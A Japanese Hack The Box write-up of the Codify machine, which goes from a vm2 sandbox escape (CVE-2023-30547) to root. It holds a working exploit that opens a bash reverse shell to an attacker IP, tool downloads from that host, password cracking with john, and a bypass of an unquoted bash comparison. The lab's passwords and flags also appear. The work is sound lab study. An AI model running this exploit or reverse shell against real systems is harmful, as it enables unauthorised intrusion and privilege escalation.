Open roaris opened 2 months ago
http:\//10.10.11.239にアクセスすると、http:\//codify.htbにリダイレクトするので、/etc/hostsに以下を追記する
10.10.11.239 codify.htb
http:\//codify.htbとhttp:\//10.10.11.239:3000はぱっと見同じ内容のページ
ブラウザ上でNode.jsが動かせるというアプリケーションらしい 説明にあるように、child_processやfsはrequire出来ないようになっている
レスポンス中のServerヘッダはApache/2.4.52(Ubuntu)、X-Powered-ByヘッダはExpress exploit-dbで調べたり、Google検索したが、Apache 2.4.52に重大な脆弱性は無さそう
ページ内に以下の記述があった
The vm2 library is a widely used and trusted tool for sandboxing JavaScript. It adds an extra layer of security to prevent potentially harmful code from causing harm to your system. We take the security and reliability of our platform seriously, and we use vm2 to ensure a safe testing environment for your code.
記述中にリンクがあった https://github.com/patriksimek/vm2/releases/tag/3.9.16 vm2 v3.9.16が使われている
CVE-2023-30547を見つけた <=3.9.16が対象
https://gist.github.com/leesh3288/381b230b04936dd4d74aaf90cc8bb244 にPoCを載せてくれている
原理はさっぱり分からないけど、以下のコードを実行することでリバースシェルが取れた
err = {};
const handler = {
getPrototypeOf(target) {
(function stack() {
new Error().stack;
stack();
})();
}
};
const proxiedErr = new Proxy(err, handler);
try {
throw proxiedErr;
} catch ({constructor: c}) {
c.constructor('return process')().mainModule.require('child_process').execSync('bash -c "bash -i >& /dev/tcp/10.10.14.42/4444 0>&1"');
}
$ nc -lvp 4444
listening on [any] 4444 ...
connect to [10.10.14.42] from codify.htb [10.10.11.239] 54100
bash: cannot set terminal process group (1271): Inappropriate ioctl for device
bash: no job control in this shell
svc@codify:~$
/home/joshuaに入れなかった
svc@codify:/home$ ls
ls
joshua
svc
svc@codify:/home$ ls svc
ls svc
svc@codify:/home$ ls joshua
ls joshua
ls: cannot open directory 'joshua': Permission denied
sudo -lもパスワードが必要とのこと
svc@codify:/home$ sudo -l
sudo -l
sudo: a terminal is required to read the password; either use the -S option to read from standard input or configure an askpass helper
sudo: a password is required
.pm2が怪しいと思ったので調べたけど、分かったことはない pm2はNode.jsのプロセスマネージャーらしい https://qiita.com/ikemura23/items/b3481393d4edca2d5188
svc@codify:~$ ls -al
ls -al
total 32
drwxr-x--- 4 svc svc 4096 Sep 26 2023 .
drwxr-xr-x 4 joshua joshua 4096 Sep 12 2023 ..
lrwxrwxrwx 1 svc svc 9 Sep 14 2023 .bash_history -> /dev/null
-rw-r--r-- 1 svc svc 220 Sep 12 2023 .bash_logout
-rw-r--r-- 1 svc svc 3771 Sep 12 2023 .bashrc
drwx------ 2 svc svc 4096 Sep 12 2023 .cache
drwxrwxr-x 5 svc svc 4096 May 9 23:42 .pm2
-rw-r--r-- 1 svc svc 807 Sep 12 2023 .profile
-rw-r--r-- 1 svc svc 39 Sep 26 2023 .vimrc
svc@codify:~$ ls -al .pm2
ls -al .pm2
total 264
drwxrwxr-x 5 svc svc 4096 May 9 23:42 .
drwxr-x--- 4 svc svc 4096 Sep 26 2023 ..
-rw-rw-r-- 1 svc svc 70370 Sep 12 2023 dump.pm2
-rw-rw-r-- 1 svc svc 84868 Sep 12 2023 dump.pm2.bak
drwxrwxr-x 2 svc svc 4096 Sep 12 2023 logs
-rw-rw-r-- 1 svc svc 2 Sep 12 2023 module_conf.json
drwxrwxr-x 2 svc svc 4096 Sep 12 2023 modules
drwxrwxr-x 2 svc svc 4096 May 9 23:42 pids
-rw-rw-r-- 1 svc svc 72034 May 9 23:42 pm2.log
-rw-r--r-- 1 svc svc 4 May 9 23:42 pm2.pid
srwxrwxr-x 1 svc svc 0 May 9 23:42 pub.sock
srwxrwxr-x 1 svc svc 0 May 9 23:42 rpc.sock
-rw-rw-r-- 1 svc svc 13 Sep 12 2023 touch
dump.pm2とdump.pm2.bakはテキストファイルだった マシン側でpython3 -m http.serverして、ローカルに持ってきて確認したが、svcやjoshuaのパスワードは書かれてなさそう
svc@codify:~$ pm2 --version
pm2 --version
5.3.0
pm2 5.3 exploitで検索すると、pm2が依存しているvm2の脆弱性が出てくるけど、pm2自体に脆弱性はなさそう
詰んだのでGuided Mode
Task1 : Which is the highest open TCP port on Codify? A : 3000
Task2 : What is the relative path on the web application that offers a form to run JavaScript code? A : /editor
Task3 : What is the name of the sandboxing library used by the application? A : vm2
Task4 : What is the 2023 CVE ID assigned to a remote code execution vulnerability in vm2 that was patched in version 3.9.17? A : CVE-2023-30547
Task5: What user is the web application running as? A : svc
Task6: There is a second NodeJS application on Codify that isn't running. What is the name of the SQLite database file used by this application? Hint : Now that you have a foothold on the machine, enumerate the web directories.
どこを見たら良いんだ
https://qiita.com/schectman-hell/items/6ac2b5dd396f12cfe874 linpeasを使うらしい 直接GitHubからマシンに持ってくることは出来なかったので、ローカルでpython -m http.serverをして、ローカルから持ってくる
svc@codify:~$ wget https://github.com/peass-ng/PEASS-ng/releases/download/20240505-284a0ce8/linpeas.sh
wget https://github.com/peass-ng/PEASS-ng/releases/download/20240505-284a0ce8/linpeas.sh
--2024-05-10 14:36:21-- https://github.com/peass-ng/PEASS-ng/releases/download/20240505-284a0ce8/linpeas.sh
Resolving github.com (github.com)... failed: Temporary failure in name resolution.
wget: unable to resolve host address ‘github.com’
svc@codify:~$ wget http://10.10.14.42:8000/linpeas.sh
wget http://10.10.14.42:8000/linpeas.sh
--2024-05-10 14:38:01-- http://10.10.14.42:8000/linpeas.sh
Connecting to 10.10.14.42:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 860337 (840K) [text/x-sh]
Saving to: ‘linpeas.sh’
0K .......... .......... .......... .......... .......... 5% 144K 6s
50K .......... .......... .......... .......... .......... 11% 295K 4s
100K .......... .......... .......... .......... .......... 17% 3.48M 2s
150K .......... .......... .......... .......... .......... 23% 316K 2s
200K .......... .......... .......... .......... .......... 29% 5.49M 2s
250K .......... .......... .......... .......... .......... 35% 6.73M 1s
300K .......... .......... .......... .......... .......... 41% 13.9M 1s
350K .......... .......... .......... .......... .......... 47% 916K 1s
400K .......... .......... .......... .......... .......... 53% 427K 1s
450K .......... .......... .......... .......... .......... 59% 8.70M 1s
500K .......... .......... .......... .......... .......... 65% 15.6M 0s
550K .......... .......... .......... .......... .......... 71% 22.6M 0s
600K .......... .......... .......... .......... .......... 77% 27.7M 0s
650K .......... .......... .......... .......... .......... 83% 35.5M 0s
700K .......... .......... .......... .......... .......... 89% 43.0M 0s
750K .......... .......... .......... .......... .......... 95% 50.6M 0s
800K .......... .......... .......... .......... 100% 265K=1.0s
2024-05-10 14:38:02 (801 KB/s) - ‘linpeas.sh’ saved [860337/860337]
svc@codify:~$ chmod +x linpeas.sh
chmod +x linpeas.sh
出力が多すぎて、どこに着目したら良いのか分からない
確かに、SQLiteのファイルあるけど、いきなり、ここに着目するのは無理がある...
╔══════════╣ Searching tables inside readable .db/.sql/.sqlite files (limit 100)
Found /var/lib/command-not-found/commands.db: SQLite 3.x database, last written using SQLite version 3037002, file counter 5, database pages 836, cookie 0x4, schema 4, UTF-8, version-valid-for 5
Found /var/lib/fwupd/pending.db: SQLite 3.x database, last written using SQLite version 3037002, file counter 3, database pages 6, cookie 0x5, schema 4, UTF-8, version-valid-for 3
Found /var/lib/PackageKit/transactions.db: SQLite 3.x database, last written using SQLite version 3037002, file counter 5, database pages 8, cookie 0x4, schema 4, UTF-8, version-valid-for 5
Found /var/lib/plocate/plocate.db: regular file, no read permission
Found /var/www/contact/tickets.db: SQLite 3.x database, last written using SQLite version 3037002, file counter 17, database pages 5, cookie 0x2, schema 4, UTF-8, version-valid-for 17
-> Extracting tables from /var/lib/command-not-found/commands.db (limit 20)
-> Extracting tables from /var/lib/fwupd/pending.db (limit 20)
-> Extracting tables from /var/lib/PackageKit/transactions.db (limit 20)
-> Extracting tables from /var/www/contact/tickets.db (limit 20)
https://0xdf.gitlab.io/2024/04/06/htb-codify.html では、/var/wwwを見ている /var/wwwを見れば、/var/www/contact/tickets.dbに着目するという発想になるのか
svc@codify:~$ ls -al /var/www
ls -al /var/www
total 20
drwxr-xr-x 5 root root 4096 Sep 12 2023 .
drwxr-xr-x 13 root root 4096 Oct 31 2023 ..
drwxr-xr-x 3 svc svc 4096 Sep 12 2023 contact
drwxr-xr-x 4 svc svc 4096 Sep 12 2023 editor
drwxr-xr-x 2 svc svc 4096 Apr 12 2023 html
svc@codify:~$ ls -al /var/www/html
ls -al /var/www/html
total 20
drwxr-xr-x 2 svc svc 4096 Apr 12 2023 .
drwxr-xr-x 5 root root 4096 Sep 12 2023 ..
-rw-r--r-- 1 svc svc 10671 Apr 12 2023 index.html
svc@codify:~$ ls -al /var/www/editor
ls -al /var/www/editor
total 64
drwxr-xr-x 4 svc svc 4096 Sep 12 2023 .
drwxr-xr-x 5 root root 4096 Sep 12 2023 ..
-rw-r--r-- 1 svc svc 1461 Sep 12 2023 index.js
drwxr-xr-x 92 svc svc 4096 Sep 12 2023 node_modules
-rw-r--r-- 1 svc svc 268 Apr 13 2023 package.json
-rw-r--r-- 1 svc svc 37562 Sep 12 2023 package-lock.json
drwxr-xr-x 2 svc svc 4096 Sep 12 2023 templates
svc@codify:~$ ls -al /var/www/editor
ls -al /var/www/editor
total 64
drwxr-xr-x 4 svc svc 4096 Sep 12 2023 .
drwxr-xr-x 5 root root 4096 Sep 12 2023 ..
-rw-r--r-- 1 svc svc 1461 Sep 12 2023 index.js
drwxr-xr-x 92 svc svc 4096 Sep 12 2023 node_modules
-rw-r--r-- 1 svc svc 268 Apr 13 2023 package.json
-rw-r--r-- 1 svc svc 37562 Sep 12 2023 package-lock.json
drwxr-xr-x 2 svc svc 4096 Sep 12 2023 templates
Task6: There is a second NodeJS application on Codify that isn't running. What is the name of the SQLite database file used by this application? Hint : Now that you have a foothold on the machine, enumerate the web directories. A : tickets.db
DB Browser for SQLiteで確認すると、joshuaのハッシュ化されたパスワードが分かった bcryptが使われている
sqlite3コマンドを使っても良かった
joshua@codify:~$ sqlite3 --version
3.37.2 2022-01-06 13:25:41 872ba256cbf61d9290b571c0e6d82a20c224ca3ad82971edc46b29818d5dalt1
joshua@codify:~$ sqlite3 /var/www/contact/tickets.db
SQLite version 3.37.2 2022-01-06 13:25:41
Enter ".help" for usage hints.
sqlite> .tables
tickets users
sqlite> select * from users;
3|joshua|$2a$12$SOn8Pf6z8fO/nVsNbAAequ/P6vLRJJl7gCUEiYBU2iLHn4G/p/Zw2
john the ripperで元のパスワードを出す
$ john hash.txt --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (bcrypt [Blowfish 32/64 X3])
Cost 1 (iteration count) is 4096 for all loaded hashes
Will run 16 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
spongebob1 (?)
1g 0:00:00:17 DONE (2024-05-11 00:11) 0.05571g/s 80.22p/s 80.22c/s 80.22C/s winston..michel
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
このパスワードを使って、suでjoshuaに切り替わり、user.txtゲット
svc@codify:~$ su joshua
su joshua
Password: spongebob1
bash -i
bash: cannot set terminal process group (1271): Inappropriate ioctl for device
bash: no job control in this shell
joshua@codify:/home/svc$ cd ~
cd ~
joshua@codify:~$ cat user.txt
cat user.txt
8a5b86ae70d18ae2b5c589c758526946
sudo -lをすると、/opt/scripts/mysql-backup.shがroot権限で実行可能なのが分かる
joshua@codify:~$ sudo -l
sudo -l
sudo: a terminal is required to read the password; either use the -S option to read from standard input or configure an askpass helper
sudo: a password is required
joshua@codify:~$ sudo -l -S
sudo -l -S
[sudo] password for joshua: spongebob1
Matching Defaults entries for joshua on codify:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin,
use_pty
User joshua may run the following commands on codify:
(root) /opt/scripts/mysql-backup.sh
joshua@codify:~$ cat /opt/scripts/mysql-backup.sh
cat /opt/scripts/mysql-backup.sh
#!/bin/bash
DB_USER="root"
DB_PASS=$(/usr/bin/cat /root/.creds)
BACKUP_DIR="/var/backups/mysql"
read -s -p "Enter MySQL password for $DB_USER: " USER_PASS
/usr/bin/echo
if [[ $DB_PASS == $USER_PASS ]]; then
/usr/bin/echo "Password confirmed!"
else
/usr/bin/echo "Password confirmation failed!"
exit 1
fi
/usr/bin/mkdir -p "$BACKUP_DIR"
databases=$(/usr/bin/mysql -u "$DB_USER" -h 0.0.0.0 -P 3306 -p"$DB_PASS" -e "SHOW DATABASES;" | /usr/bin/grep -Ev "(Database|information_schema|performance_schema)")
for db in $databases; do
/usr/bin/echo "Backing up database: $db"
/usr/bin/mysqldump --force -u "$DB_USER" -h 0.0.0.0 -P 3306 -p"$DB_PASS" "$db" | /usr/bin/gzip > "$BACKUP_DIR/$db.sql.gz"
done
/usr/bin/echo "All databases backed up successfully!"
/usr/bin/echo "Changing the permissions"
/usr/bin/chown root:sys-adm "$BACKUP_DIR"
/usr/bin/chmod 774 -R "$BACKUP_DIR"
/usr/bin/echo 'Done!'
書き換えは出来ない
joshua@codify:~$ ls -l /opt/scripts/mysql-backup.sh
ls -l /opt/scripts/mysql-backup.sh
-rwxr-xr-x 1 root root 928 Nov 2 2023 /opt/scripts/mysql-backup.sh
joshua / spongebob1でMySQLにアクセス出来た
joshua@codify:~$ mysql -ujoshua -h 0.0.0.0 -P 3306 -p
Enter password:
Welcome to the MySQL monitor. Commands end with ; or \g.
Your MySQL connection id is 8
Server version: 5.5.5-10.10.3-MariaDB-1:10.10.3+maria~ubu2204 mariadb.org binary distribution
Copyright (c) 2000, 2023, Oracle and/or its affiliates.
Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
mysql> show databases;
+--------------------+
| Database |
+--------------------+
| information_schema |
| mysql |
| performance_schema |
| sys |
+--------------------+
4 rows in set (0.00 sec)
mysql.userにハッシュ化されたパスワードが載っている
mysql> use mysql;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
Database changed
mysql> select * from user;
+-----------+-------------+-------------------------------------------+-------------+-------------+-------------+-------------+-------------+-----------+-------------+---------------+--------------+-----------+------------+-----------------+------------+------------+--------------+------------+-----------------------+------------------+--------------+-----------------+------------------+------------------+----------------+---------------------+--------------------+------------------+------------+--------------+------------------------+---------------------+----------+------------+-------------+--------------+---------------+-------------+-----------------+----------------------+-----------------------+-------------------------------------------+------------------+---------+--------------+--------------------+
| Host | User | Password | Select_priv | Insert_priv | Update_priv | Delete_priv | Create_priv | Drop_priv | Reload_priv | Shutdown_priv | Process_priv | File_priv | Grant_priv | References_priv | Index_priv | Alter_priv | Show_db_priv | Super_priv | Create_tmp_table_priv | Lock_tables_priv | Execute_priv | Repl_slave_priv | Repl_client_priv | Create_view_priv | Show_view_priv | Create_routine_priv | Alter_routine_priv | Create_user_priv | Event_priv | Trigger_priv | Create_tablespace_priv | Delete_history_priv | ssl_type | ssl_cipher | x509_issuer | x509_subject | max_questions | max_updates | max_connections | max_user_connections | plugin | authentication_string | password_expired | is_role | default_role | max_statement_time |
+-----------+-------------+-------------------------------------------+-------------+-------------+-------------+-------------+-------------+-----------+-------------+---------------+--------------+-----------+------------+-----------------+------------+------------+--------------+------------+-----------------------+------------------+--------------+-----------------+------------------+------------------+----------------+---------------------+--------------------+------------------+------------+--------------+------------------------+---------------------+----------+------------+-------------+--------------+---------------+-------------+-----------------+----------------------+-----------------------+-------------------------------------------+------------------+---------+--------------+--------------------+
| localhost | mariadb.sys | | N | N | N | N | N | N | N | N | N | N | N | N | N | N | N | N | N | N | N | N | N | N | N | N | N | N | N | N | N | N | | | | | 0 | 0 | 0 | 0 | mysql_native_password | | Y | N | | 0.000000 |
| localhost | root | *4ECCEBD05161B6782081E970D9D2C72138197218 | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | | | | | 0 | 0 | 0 | 0 | mysql_native_password | *4ECCEBD05161B6782081E970D9D2C72138197218 | N | N | | 0.000000 |
| 127.0.0.1 | root | *4ECCEBD05161B6782081E970D9D2C72138197218 | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | | | | | 0 | 0 | 0 | 0 | mysql_native_password | *4ECCEBD05161B6782081E970D9D2C72138197218 | N | N | | 0.000000 |
| % | passbolt | *63DA7233CC5151B814CBEC5AF8B3EAC43347A203 | N | N | N | N | N | N | N | N | N | N | N | N | N | N | N | N | N | N | N | N | N | N | N | N | N | N | N | N | N | N | | | | | 0 | 0 | 0 | 0 | mysql_native_password | *63DA7233CC5151B814CBEC5AF8B3EAC43347A203 | N | N | | 0.000000 |
| % | joshua | *323A5EDCBFA127CC75F6C155457533AC1D5C4921 | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | N | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | | | | | 0 | 0 | 0 | 0 | mysql_native_password | *323A5EDCBFA127CC75F6C155457533AC1D5C4921 | N | N | | 0.000000 |
| % | root | *4ECCEBD05161B6782081E970D9D2C72138197218 | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | | | | | 0 | 0 | 0 | 0 | mysql_native_password | *4ECCEBD05161B6782081E970D9D2C72138197218 | N | N | | 0.000000 |
+-----------+-------------+-------------------------------------------+-------------+-------------+-------------+-------------+-------------+-----------+-------------+---------------+--------------+-----------+------------+-----------------+------------+------------+--------------+------------+-----------------------+------------------+--------------+-----------------+------------------+------------------+----------------+---------------------+--------------------+------------------+------------+--------------+------------------------+---------------------+----------+------------+-------------+--------------+---------------+-------------+-----------------+----------------------+-----------------------+-------------------------------------------+------------------+---------+--------------+--------------------+
6 rows in set (0.00 sec)
323A5EDCBFA127CC75F6C155457533AC1D5C4921 をjohn the ripperに与えると、元のパスワードが出てきたが、4ECCEBD05161B6782081E970D9D2C72138197218 を与えても上手くいかない
$ john hash.txt --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (mysql-sha1, MySQL 4.1+ [SHA1 256/256 AVX2 8x])
Warning: no OpenMP support for this hash type, consider --fork=16
Press 'q' or Ctrl-C to abort, almost any other key for status
spongebob1 (?)
1g 0:00:00:00 DONE (2024-05-11 00:39) 3.846g/s 5200p/s 5200c/s 5200C/s teacher..special
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
$ john hash.txt --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (mysql-sha1, MySQL 4.1+ [SHA1 256/256 AVX2 8x])
Warning: no OpenMP support for this hash type, consider --fork=16
Press 'q' or Ctrl-C to abort, almost any other key for status
0g 0:00:00:01 DONE (2024-05-11 00:40) 0g/s 10317Kp/s 10317Kc/s 10317KC/sa6_123..*7¡Vamos!
Session completed.
/opt/scripts/mysql-backup.shで権限昇格する方法が全く分からない また詰んだので、Guided Mode
Task9 : What is the full path of the script that the joshua user can run as root? A : /opt/scripts/mysql-backup.sh
Task10 : Which single character is accepeted as the password, bypassing the password check in the script? Hint : When the right-hand side of an equals operation inside double brackets is not quoted, it is evaluated as a pattern instead of a string.
どういうこと?
https://0xdf.gitlab.io/2024/04/06/htb-codify.html#vulnerabilities
if [[ $DB_PASS == $USER_PASS ]]; then
が駄目らしい
https://mywiki.wooledge.org/BashPitfalls?source=post_page-----933488bfbfff--------------------------------#A.5B_.24foo_.3D_.22bar.22_.5D
ほとんど理解できてないけど正しくは、if [[ $DB_PASS == "$USER_PASS" ]]; then
らしい
こうしないと、$USER_PASSが*の時にバイパス出来てしまうらしい
A : *
Task11 : What is the root user's MySQL password? Hint : The bash script executes the mysqldump command, transmitting the root user's password via the command line. Using a process snooper like pspy, you will be able to see the command being executed and read the password.
/usr/bin/mysqldump --force -u "$DB_USER" -h 0.0.0.0 -P 3306 -p"$DB_PASS" "$db" | /usr/bin/gzip > "$BACKUP_DIR/$db.sql.gz"
のように、パスワードをコマンドライン上で指定しているのが問題
pspyというのを使うらしい
ローカルでpython -m http.serverをして、ローカルから持ってくる
joshua@codify:~$ wget http://10.10.14.42:8000/pspy64
--2024-05-10 16:30:55-- http://10.10.14.42:8000/pspy64
Connecting to 10.10.14.42:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 3104768 (3.0M) [application/octet-stream]
Saving to: ‘pspy64’
pspy64 100%[===================>] 2.96M 1.11MB/s in 2.7s
2024-05-10 16:30:58 (1.11 MB/s) - ‘pspy64’ saved [3104768/3104768]
joshua@codify:~$ chmod +x pspy64
./pspy64をした状態で、sudo /opt/scripts/mysql-backup.sh → *を入力 をすると、以下のように、DB_PASSが分かった
2024/05/10 16:35:01 CMD: UID=0 PID=41773 | sudo /opt/scripts/mysql-backup.sh
2024/05/10 16:35:01 CMD: UID=0 PID=41774 |
2024/05/10 16:35:04 CMD: UID=0 PID=41775 | /usr/bin/echo
2024/05/10 16:35:04 CMD: UID=0 PID=41776 | /usr/bin/echo Password confirmed!
2024/05/10 16:35:04 CMD: UID=0 PID=41777 | /bin/bash /opt/scripts/mysql-backup.sh
2024/05/10 16:35:04 CMD: UID=0 PID=41778 | /bin/bash /opt/scripts/mysql-backup.sh
2024/05/10 16:35:04 CMD: UID=0 PID=41780 | /usr/bin/grep -Ev (Database|information_schema|performance_schema)
2024/05/10 16:35:04 CMD: UID=0 PID=41779 | /bin/bash /opt/scripts/mysql-backup.sh
2024/05/10 16:35:04 CMD: UID=0 PID=41781 | /bin/bash /opt/scripts/mysql-backup.sh
2024/05/10 16:35:04 CMD: UID=0 PID=41783 | /bin/bash /opt/scripts/mysql-backup.sh
2024/05/10 16:35:04 CMD: UID=0 PID=41782 |
2024/05/10 16:35:04 CMD: UID=0 PID=41784 | /usr/bin/echo Backing up database: sys
2024/05/10 16:35:04 CMD: UID=0 PID=41786 | /bin/bash /opt/scripts/mysql-backup.sh
2024/05/10 16:35:04 CMD: UID=0 PID=41785 | /usr/bin/mysqldump --force -u root -h 0.0.0.0 -P 3306 -pkljh12k3jhaskjh12kjh3 sys
2024/05/10 16:35:05 CMD: UID=0 PID=41787 | /bin/bash /opt/scripts/mysql-backup.sh
2024/05/10 16:35:05 CMD: UID=0 PID=41788 |
2024/05/10 16:35:05 CMD: UID=0 PID=41789 | /usr/bin/chown root:sys-adm /var/backups/mysql
2024/05/10 16:35:05 CMD: UID=0 PID=41790 |
2024/05/10 16:35:05 CMD: UID=0 PID=41791 | /usr/bin/echo Done!
Task11 : What is the root user's MySQL password? Hint : The bash script executes the mysqldump command, transmitting the root user's password via the command line. Using a process snooper like pspy, you will be able to see the command being executed and read the password. A : kljh12k3jhaskjh12kjh3
取得したパスワードでrootに切り替わって、root.txtゲット
joshua@codify:~$ su
Password:
root@codify:/home/joshua# cd /root
root@codify:~# cat root.txt
ad143b379fa805c854a040b8696fc2ce
解き方まとめ
https://qiita.com/schectman-hell/items/6ac2b5dd396f12cfe874 rootのパスワードは前から1文字ずつ特定する方法でも良かった(Blind SQLインジェクションでパスワードを特定するのに似てる)
https://app.hackthebox.com/machines/Codify